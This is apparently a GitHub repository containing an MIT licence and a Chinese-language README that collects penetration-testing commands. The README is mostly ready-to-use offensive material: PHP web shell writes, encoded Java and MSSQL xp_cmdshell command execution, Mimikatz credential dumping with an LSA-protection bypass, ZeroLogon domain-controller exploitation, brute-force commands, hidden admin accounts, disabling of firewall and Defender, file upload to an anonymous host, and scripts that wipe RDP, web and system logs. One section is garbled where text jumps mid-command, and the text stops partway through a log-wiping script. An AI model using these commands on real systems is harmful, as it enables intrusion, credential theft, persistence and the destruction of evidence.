├── LICENSE └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 safe6 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # command 2 | 收集渗透中会用到的常用命令。 3 | 4 | 5 | 6 | 建议直接[Ctrl+F]查找 7 | 8 | 9 | ## java命令执行 10 | 如下编码网站： 11 | https://ares-x.com/tools/runtime-exec/ 12 | https://r0yanx.com/tools/java_exec_encode/ 13 | https://www.bugku.net/runtime-exec-payloads/ 14 | 15 | 手动编码操作 16 | ``` 17 | bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64,-d}|{bash,-i} 18 | ``` 19 | 20 | Windows下 21 | ``` 22 | getRuntime().exec(\"cmd /c echo 1 > D://tomcat//webapps//ROOT//90s.txt\"); 23 | ``` 24 | 25 | 26 | ## 命令执行，定位资源文件写文件回显 27 | Linux 28 | ``` 29 | find /|grep index.js|while read f;do sh -c "whoami" >$(dirname $f)/test.txt;done 30 | ``` 31 | Windows(注意盘符) 32 | ``` 33 | for /r D:\ %i in (index.js*) do whoami > %i/../test.txt 34 | 35 | ``` 36 | 37 | ## 写shell 38 | 在windows中，批处理需要转义字符主要有 “&”，“|”，“<”，“>”等等，转义字符为”^” 39 | 在Linux中，需要转义字符主要是单引号或者双引号对于单引号，我们将其替换为\47即可。 40 | windows命令行最大长度为8191,16进制长度是113898。echo写文件时注意长度。 41 | 42 | 方法1 43 | ``` 44 | set /p=qaxnbd:\1d13.txt 45 | ``` 46 | 方法2 47 | ``` 48 | echo qaxnb>1we.txt 49 | ``` 50 | 追加内容 51 | ``` 52 | echo qaxnb>>1we.txt 53 | ``` 54 | 不换行追加 55 | ``` 56 | set /p="121d2">>a.txt 57 | ``` 58 | 规避空格 59 | ``` 60 | echo.123>>a.txt 61 | echo,123>>a.txt 62 | type;a.txt 63 | ``` 64 | powershell写文件 65 | ``` 66 | powershell -c "'a' | Out-File C:\1.txt -Append -NoNewline" 67 | ``` 68 | 69 | 写特殊字符很多的文件，可以用certutil编码再还原。 70 | ``` 71 | hex 72 | certutil -encodehex 111.jsp 111.txt 73 | 74 | base64 75 | certutil -encode 111.jsp 111.txt 76 | 77 | mac命令行快速转换hex 78 | xxd -ps -u Everything.exe | tr -d '\n' >ou.txt 79 | ``` 80 | 81 | 如下还原 82 | ``` 83 | certutil -f -decode 111.txt C:\\111.jsp 84 | certutil -decodehex 111.txt C:\\111.jsp 85 | 86 | 看hash 87 | certutil -hashfile a.exe MD5 88 | ``` 89 | linux下base64 90 | ``` 91 | echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php 92 | ``` 93 | php的 94 | ``` 95 | echo \<\?php eval$\@\$_POST\[1\]$\; \?\> >1.php 96 | ``` 97 | 绕过空格 98 | ``` 99 | > < <> 重定向符 100 | %09(需要php环境) 101 | ${IFS} 102 | $IFS$9 103 | {cat,flag.php} 104 | %20 105 | %09 106 | ``` 107 | 108 | ## windows打包目录 109 | 110 | ``` 111 | powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip" 112 | ``` 113 | 114 | ## 匿名文件存储 115 | 可用命令行 116 | https://transfer.sh/ 117 | 使用很简单 118 | ``` 119 | 上传，成功后返回随机路径 120 | curl --upload-file ./hello.txt https://transfer.sh/hello.txt 121 | 122 | 获取 123 | https://transfer.sh/fF6OA7aF8o/hello.txt 124 | 125 | ``` 126 | 127 | 128 | ## nbtscan 129 | 130 | ``` 131 | nbtscan.exe 10.11.1.0/24 132 | ``` 133 | 134 | ## dos命令存活主机探测 135 | ``` 136 | for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr "TTL=" 137 | ``` 138 | 139 | 140 | ## nmap 141 | 142 | 只执行 ping 扫描。它不会进行任何端口扫描或服务/版本检测 143 | ``` 144 | nmap -sn 10.11.1.0/24 145 | ``` 146 | 147 | SYN扫描，不ping 148 | ``` 149 | sudo nmap -sS -Pn 192.168.10.1/24 150 | ``` 151 | 152 | udp发包探测存活，比较慢 153 | ``` 154 | sudo nmap -sU -Pn 10.11.1.0/24 155 | ``` 156 | 多种方式，进行存活探测(TCP ACK、TCP FIN 和 UDP 数据包来探测主机) 157 | ``` 158 | sudo nmap -PA -Pn 192.168.10.1/24 159 | ``` 160 | 161 | 扫描版本，全端口 162 | ``` 163 | nmap -sV -p- 10.11.1.0 164 | ``` 165 | 166 | ``` 167 | nmap 10.11.1.0 --script vuln 168 | ``` 169 | 170 | ``` 171 | nmap -p445 10.11.1.0 --script smb-vuln-ms17-010 172 | ``` 173 | 174 | ``` 175 | nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oG tmp -iL ip.txt | awk '{print $5}' | grep -v "latency)." >ok_ip.txt 176 | ``` 177 | 178 | nmap 极速扫描，快如闪电 179 | ``` 180 | nmap -n --unique --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1 181 | nmap -n --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1 182 | ``` 183 | 184 | 获取http title 185 | ``` 186 | nmap -n --resolve-all -Pn --min-hostgroup --max-retries 3 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 10000 --script=http-title -T4 -p- -iL domain.txt 187 | ``` 188 | 189 | ## masscan 190 | 注意速率问题,根据带宽调整。100m带宽可调3000,注意是vps，不是家庭宽带。 191 | 192 | 关于编译，直接git拉下来，make就行。生成的文件在bin下面。 193 | 扫描单ip 194 | ``` 195 | masscan 192.168.1.110 -p 1-65535 --rate=1000 196 | ``` 197 | 扫描列表 198 | ``` 199 | masscan -iL ip.txt -p1-65535 --rate=1000 -oL port.txt 200 | ``` 201 | 202 | 解析,提取ip:port 203 | ``` 204 | cat port.txt |awk '{print $4":"$3}' 205 | ``` 206 | 转换为nmap可用端口 207 | ``` 208 | cat p.txt | tr "\n" , 209 | ``` 210 | 211 | 212 | 213 | 214 | ## 端口列表 215 | 216 | ``` 217 | 22,23,135,445,389,3389,80,443,8080,7001,3306,1433,1521,6379,27017,2375,5900,5432,4899 218 | 219 | 21-23,80-90,135,137,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2375,2376,2601,2604,3128,3306,3311,3312,3389,4440,4848,5001,5432,5560,5900-5902,6082,6379,7001-7010,7778,8009,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,51111,50030,50060 220 | 221 | 20-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50050,50300,50389,50500,50636,50800,51111,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389 222 | 223 | ``` 224 | 225 | ## 字典 226 | 227 |

228 |

top200

441 | 442 | 443 | ## Mimikatz 444 | 445 | 一条命令 446 | ``` 447 | .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit 448 | ``` 449 | 控制台执行多条命令，用log防止进程崩溃，数据丢失 450 | ``` 451 | mimikatz # privilege::debug 452 | mimikatz # log 453 | mimikatz # sekurlsa::logonpasswords 454 | mimikatz # sekurlsa::wdigest 455 | ``` 456 | msf中执行命令 457 | ``` 458 | mimikatz_command -f sekurlsa::logonPasswords full 459 | mimikatz_command -f sekurlsa::wdigest 460 | ``` 461 | 注册表开启wdigest,08r2后默认关闭。需要目标注销，重新登录。2016需要重启。 462 | ``` 463 | reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1 464 | ``` 465 | ### bypass lsa Protection(ppl) 466 | 查询是否启用 467 | ``` 468 | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa 469 | 470 | ``` 471 | 把mimidriver.sys拷贝到同级目录，进行加载bypass 472 | ``` 473 | mimikatz # !+ 474 | mimikatz # !processprotect /process:lsass.exe /remove 475 | mimikatz # privilege::debug 476 | mimikatz # token::elevate 477 | mimikatz # sekurlsa::logonpasswords 478 | mimikatz # !processprotect /process:lsass.exe 479 | mimikatz # !- 480 | ``` 481 | 482 | 483 | 484 | 485 | 486 | ## cs凭证解析 487 | 488 | 提取用户名 489 | ``` 490 | awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}' 491 | ``` 492 | 提取hash 493 | ``` 494 | awk -F":::" '{print $2}' credentials.txt 495 | ``` 496 | 497 | 498 | 499 | 500 | 501 | ## ping存活主机扫描 502 | ``` 503 | for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr "TTL=" 504 | ``` 505 | 506 | 507 | 508 | ## gobuster 509 | 510 | ``` 511 | gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt 512 | ``` 513 | 514 | ## dirsearch 515 | 516 | ``` 517 | python3 dirsearch.py -e php,html,js -u https://target 518 | ``` 519 | 520 | ``` 521 | python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist 522 | ``` 523 | 524 | 扫目录 525 | ``` 526 | python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist --remove-extensions 527 | ``` 528 | 529 | ``` 530 | python3 dirsearch.py -e php,htm,js,bak,zip,tgz,txt -u https://target -t 20 531 | ``` 532 | 533 | ``` 534 | python3 dirsearch.py -e php,html,js -u https://target --proxy 127.0.0.1:8080 535 | ``` 536 | 537 | ``` 538 | python3 dirsearch.py -e php,html,js -u https://target --proxy socks5://10.10.0.1:8080 539 | ``` 540 | 541 | 从文件读取批量扫描 542 | ``` 543 | python3 dirsearch.py -l all_site.txt -o result.txt 544 | ``` 545 | 546 | ## 代理工具 547 | proxychain 548 | sockscap64 549 | proxifier 550 | ccproxy 551 | sockscap 552 | 553 | https://drive.google.com/drive/folders/1x5naJeK2YkV6QCYUlUg5QNMl1Izf4-ti 554 | https://www.mediafire.com/folder/32rj1769a2w82/v4.7 555 | 556 | 557 | ## 内网穿透工具 558 | 559 | ### fuso 560 | 561 | - https://github.com/editso/fuso.git 562 | - 相对冷门，不会被杀 563 | 在9004上开启socks5代理 564 | ``` 565 | fuc.exe 159.138.0.0 9003 -h 127.0.0.1 -p 9004 -b 9004 -n test -t socks5 --bridge-host 0.0.0.0 --bridge-port 9004 566 | ``` 567 | 568 | ### frp 569 | 570 | ### nps 571 | https://github.com/ehang-io/nps 572 | 573 | ``` 574 | sudo ./nps install 575 | sudo nps start 576 | ``` 577 | 安装后配置文件位置/etc/nps，默认密码(可在配置文件里面修改)admin/123 578 | 579 | ### iox 580 | 581 | ### Stowaway 582 | https://github.com/lz520520/Stowaway 583 | 584 | ### Venom 585 | https://github.com/Dliv3/Venom 586 | 587 | 588 | 589 | ## ssh 590 | 无记录shell 591 | 592 | ``` 593 | ssh -T root@192.168.1.1 /usr/bin/bash -i 594 | ``` 595 | 596 | ## grep搜索 597 | 598 | ``` 599 | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto 600 | ``` 601 | 602 | ``` 603 | grep -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" -r xxx --color=auto 604 | ``` 605 | 606 | ``` 607 | grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/ 608 | ``` 609 | 610 | ``` 611 | grep -ohr -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" /app/ |sort|uniq >> test.txt 612 | ``` 613 | 614 | web应用 615 | ``` 616 | grep -EHirn '--include=*.'{java,jsp,jspx,xml,conf,json,ini,properties,yaml,toml,plist,txt,sql} "accesskey|api_key|apikey|jdbc|username|pass|passwd|password" webapps/ 617 | ``` 618 | 619 | 搜索文件内的字符串 620 | ``` 621 | grep -r "test" ./src 622 | 623 | 显示行号 624 | grep -rn "test" ./src 625 | ``` 626 | 627 | 628 | ## mysql 629 | 630 | 开远程 631 | 632 | ``` 633 | use mysql; 634 | update user set host = '%' where user = 'root'; 635 | FLUSH PRIVILEGES ; 636 | select host, user from user; 637 | mysql -uroot -p -e "select * from mysql.user;" >1.txt 638 | ``` 639 | 640 | 不登录直接执行sql 641 | ``` 642 | mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt 643 | mysql -uroot -e "show databases;" >1.txt 644 | ``` 645 | 646 | mysql getshell 647 | 648 | ``` 649 | show variables like '%secure%' 650 | select '' into outfile '/var/www/xx.php'; 651 | select '' into dumpfile '/var/www/xx.php'; 652 | ``` 653 | 654 | ``` 655 | set global general_log=on; 656 | set global general_log_file='/var/www/1.php'; 657 | select ''; 658 | ``` 659 | 660 | ``` 661 | select '' into outfile 'C:/wamp/www/abb.php'; 662 | 663 | ``` 664 | 665 | ## sqlmap 666 | 667 | ``` 668 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --proxy "http://127.0.0.1:1080" 669 | ``` 670 | 671 | ``` 672 | python sqlmap.py -u "http://www.vuln.cn" –cookie "id=11" --level 2 673 | ``` 674 | 675 | ``` 676 | python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3 677 | ``` 678 | 679 | ``` 680 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --dbs 681 | ``` 682 | 683 | ``` 684 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=*" --dbms mysql --dbs 685 | ``` 686 | 687 | ``` 688 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test --tables 689 | ``` 690 | 691 | ``` 692 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin –-columns 693 | ``` 694 | 695 | ``` 696 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin -C "username,password" --dump 697 | ``` 698 | 699 | ``` 700 | python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php" 701 | ``` 702 | 703 | 自写tamper调试 704 | ``` 705 | python sqlmap.py -u "http://www.vuln.cn/post.php?id=1&pwd=11;*&page=1&clientip=1" --dbms mssql --proxy "http://192.168.2.144:8443" --tamper=custom_key_tamper -v 3 --batch --random-agent 706 | ``` 707 | 708 | ## sql注入 709 | 710 | ### mssql 711 | 堆叠注入，xpcmdshell 712 | ``` 713 | http://www.vuln.cn/post.php?id=11;DECLARE/**/@ljbd/**/VARCHAR(8000);SET/**/@ljbd=0x70696e67202d6e6320312077772e36373332396163312e646e732e313433332e65752e6f7267;EXEC/**/master..xp_cmdshell/**/@ljbd-- 714 | ``` 715 | 716 | 写clr 需要提前把dll转为hex，分批写入 717 | ``` 718 | >>"c:\windows\tasks\clrdatabase.dll.tmp" set /p="000000001b300b00300000""D:\\web\\Admin\\script\\sa.aspx" set /p="0x3c25402050616765204c616e67756167653d22432322253e0d0a3c254020496d706f7274204e616d6573706163653d225379737"$(dirname $file)/finddir.txt;done 835 | 删 836 | find /root -name war|while read file;do sh -c "rm $(dirname $file)/finddir.txt";done 837 | 838 | #### 在/root war文件夹下 839 | 写 840 | find /root -name war|while read file;do sh -c "echo $file">$file/finddir.txt;done 841 | 删 842 | find /root -name war|while read file;do sh -c "rm $file/finddir.txt";done 843 | 844 | ### windows 845 | for /d %i in (D:\web\*) do whoami > "%i\test.txt" 846 | 847 | #### 在C:\Users\liulangmao\Desktop任意子目录 war.txt文件的同目录下 848 | 写 849 | for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (echo %i > %i\..\finddir.txt) 850 | 删 851 | for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (del %i\..\finddir.txt) 852 | 853 | #### 在C:\Users\liulangmao\Desktop任意子目录 war文件夹下 854 | 写 855 | for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (echo %i > %i\finddir.txt) 856 | 删 857 | for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (del %i\finddir.txt) 858 | ``` 859 | 示例：在weblogic靶机/root 所有war文件夹下的finddir.txt文件中写入该war文件夹的路径。 860 | ``` 861 | find /root -name war|while read file;do sh -c "echo $file">$file/finddir.txt;done 862 | 863 | ``` 864 | 程序名找启动路径 865 | ``` 866 | wmic process where name='mysqld.exe' get processid,executablepath,name 867 | ``` 868 | 程序pid找路径 869 | ``` 870 | wmic process get name,executablepath,processid|findstr pid 871 | ``` 872 | 873 | 启动路径找login.jsp 874 | ``` 875 | for /f %i in ('dir /s /b D:\UFGOV\U8\login.jsp') do (echo %i) 876 | ``` 877 | 878 | base64分段不换行追加写文件 879 | ``` 880 | echo|set /p=\"PCFET0NUWVBFIGh0bWw+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+PGgxPjIwMjHlubR4eHjnvZHnu5zlronlhajlrp7miJjmvJTnu4M8L2gxPg==\" > D:\UFGOV\U8\webapps\demonstrate.txt 881 | ``` 882 | 883 | 解决cmd无回显问题 884 | ``` 885 | powershell Get-ChildItem C: 886 | ``` 887 | 888 | 889 | ## hydra 890 | 891 | ``` 892 | 参数： 893 | -l 指定的用户名 -L 用户名字典 894 | -p 指定密码 -P 密码字典 895 | -s 指定端口 896 | -o 输出文件 897 | -t 任务数默认16 898 | -f 爆破成功一个就停止 899 | -v 报错日志详细 -V 攻击日志 900 | >hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql 901 | >hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4 902 | >hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv 903 | >hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V 904 | >hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV 905 | >hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10 906 | ``` 907 | 908 | ## medusa 909 | 910 | ``` 911 | 参数： 912 | -h 目标名或IP -H 目标列表 913 | -u 用户名 -U 用户名字典 914 | -p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程 915 | -n 指定端口 -e ns 尝试空密码和用户名密码相同 916 | >medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql 917 | >medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql 918 | ``` 919 | 920 | ## python交互shell 921 | 922 | py3 923 | 924 | ``` 925 | python3 -c "import pty;pty.spawn('/bin/bash')" 926 | ``` 927 | 928 | py2 929 | ``` 930 | python2 -c 'import pty;pty.spawn("/bin/sh")' 931 | 932 | python -c 'import pty;pty.spawn("/bin/bash")' 933 | ``` 934 | 用完记得清记录 935 | ``` 936 | history -c 937 | ``` 938 | 939 | 940 | ## 无交互添加用户 941 | 942 | ``` 943 | useradd newuser;echo "newuser:password"|chpasswd 944 | ``` 945 | 946 | ``` 947 | useradd -p `openssl passwd 123456` guest 948 | ``` 949 | 950 | ``` 951 | useradd -p "$(openssl passwd 123456)" guest 952 | ``` 953 | 954 | ``` 955 | useradd newuwer;echo -e "123456\n123456\n" |passwd newuser 956 | ``` 957 | 958 | ### windows添加用户 959 | ``` 960 | net user admin$ Afabab@20 /add 961 | net localgroup administrators admin$ /add 962 | 963 | net user guest /active:yes 964 | net localgroup administrators guest /add 965 | 966 | Net localgroup Administrators kent /add /domain 将域用户添加到域管理员组 967 | 968 | Net localgroup Administrators /add test\kent 将域用户添加到本地管理员组 969 | ``` 970 | 971 | ## 防火墙操作 972 | ``` 973 | 关闭防火墙 974 | 975 | netsh firewall set opmode mode=disable 976 | 977 | 放行远程8888端口进来的流量 978 | netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow 979 | 980 | 放行出去到远程8888端口的流量 981 | netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow 982 | 983 | 放行本地4444端口出去的流量 984 | netsh advfirewall firewall add rule name="44" protocol=TCP dir=out localport=4444 action=allow 985 | 986 | 放行从本地4444端口进来的流量 987 | netsh advfirewall firewall add rule name="44" protocol=TCP dir=in localport=4444 action=allow 988 | 989 | 删除规则 990 | netsh advfirewall firewall delete rule name="88" 991 | 992 | 查看防火墙配置(可看到具体规则等配置) 993 | netsh firewall show config 994 | 995 | 关闭windefebd 996 | net stop windefend 997 | 998 | netsh firewall set portopening TCP 445 ENABLE //打开445端口 999 | netsh firewall set portopening TCP 3389 ENABLE //开放终端 1000 | netsh firewall delete allowedprogram C:/A.exe //删除放行程序A.exe 1001 | netsh firewall set allowedprogram C:/A.exe test ENABLE //添加程序C盘下的A.exe并放行 1002 | netsh firewall add allowedprogram C:/A.exe test ENABLE //添加程序C盘下的A.exe并放行 1003 | 1004 | 新版本命令 1005 | 1006 | netsh advfirewall firewall add rule name="test" dir=in action=allow program="C:\windows\temp\update.exe" enable=yes 1007 | netsh advfirewall firewall add rule name="test" dir=out action=allow program="C:\windows\temp\update.exe" enable=yes 1008 | 1009 | ``` 1010 | 端口转发 1011 | 把本地的 801 端口转发到远程的 172.23.80.14 的 80 端口 1012 | ``` 1013 | netsh interface portproxy add v4tov4 listenport=801 connectport=80 connectaddress=172.23.80.14 1014 | ``` 1015 | 1016 | iptables 放行 1017 | ``` 1018 | iptables -A INPUT -p tcp --dport 80 -j ACCEPT 1019 | 1020 | ``` 1021 | 1022 | ## frp常用配置 1023 | frpc.ini 1024 | ``` 1025 | [common] 1026 | server_addr = xxxxxx 1027 | server_port = 7000 1028 | 1029 | [rdp] 1030 | type = tcp 1031 | local_port = 3389 1032 | remote_port = 3389 1033 | 1034 | [plugin_http_proxy] 1035 | type = tcp 1036 | remote_port = 10801 1037 | plugin = http_proxy 1038 | 1039 | [plugin_socks5] 1040 | type = tcp 1041 | remote_port = 1080 1042 | plugin = socks5 1043 | 1044 | ``` 1045 | 1046 | ## ZeroLogon 1047 | 1048 | - 产生日志 4742(利用成功), 5580(利用失败) 1049 | - 流量特征明显 1050 | - 会被av直接秒 1051 | - 有可能会导致目标脱域 1052 | - 代理不稳，容易出问题 1053 | 1054 | 1055 | 1056 | ``` 1057 | git clone https://github.com/mstxq17/cve-2020-1472.git 1058 | 1059 | python3 zerologon_tester.py Dc02 172.23.119.120 域外检测 1060 | 1061 | PingCastle.exe --server 172.23.119.120 --scanner zerologon --scmode-dc 域内检测 1062 | 1063 | ``` 1064 | 1065 | 洞清空目标域控机器账户密码 1066 | ``` 1067 | python3 cve-2020-1472-exploit.py Dc02$ 172.23.119.120 1068 | 1069 | ``` 1070 | 无密码远程提取 ntds.dit 1071 | ``` 1072 | python3 secretsdump.py qq.local/'Dc02$'@172.23.119.120 -no-pass -outputfile qq.local.ntds.hash 1073 | ``` 1074 | 1075 | 用 administrator 域管账户 hash 远程导出域控机器账户 hash [hex 格式] 1076 | ``` 1077 | python3 secretsdump.py -hashes :ccef208c6485269c20db2cad21734fe7 qq/administrator@172.23.119.120 1078 | ``` 1079 | 用上面的 hex 还原目标域控机器账户密码 1080 | ``` 1081 | python3 restorepassword.py Dc02@Dc02 -target-ip 172.23.119.120 -hexpass daf1d2acc25d2e54218921737a40d58192b9bcdf089ddbeaf9f7931571b07916f96e2c51d8d00f56d2440c13c0e5586e2dafd1669e37131*** 1082 | 1083 | ``` 1084 | 1085 | 1086 | 1087 | ## 删rdp日志 1088 | 1089 | 清除远程桌面连接记录,创建clear.bat 1090 | 1091 | ``` 1092 | @echo off 1093 | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f 1094 | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f 1095 | reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 1096 | cd %userprofile%\documents\attrib Default.rdp -s -h 1097 | del Default.rdp 1098 | ``` 1099 | 1100 | ## 删web日志 1101 | ``` 1102 | /var/log/nginx/ 1103 | 1104 | access.log 1105 | error.log 1106 | 1107 | tomcat 位于 logs 1108 | catalina.*.log 1109 | access_log.*.txt 1110 | 1111 | ``` 1112 | 1113 | linux 系统日志 1114 | ``` 1115 | #!/usr/bin/bash 1116 | echo > /var/log/syslog 1117 | echo > /var/log/messages 1118 | echo > /var/log/httpd/access_log 1119 | echo > /var/log/httpd/error_log 1120 | echo > /var/log/xferlog 1121 | echo > /var/log/secure 1122 | echo > /var/log/auth.log 1123 | echo 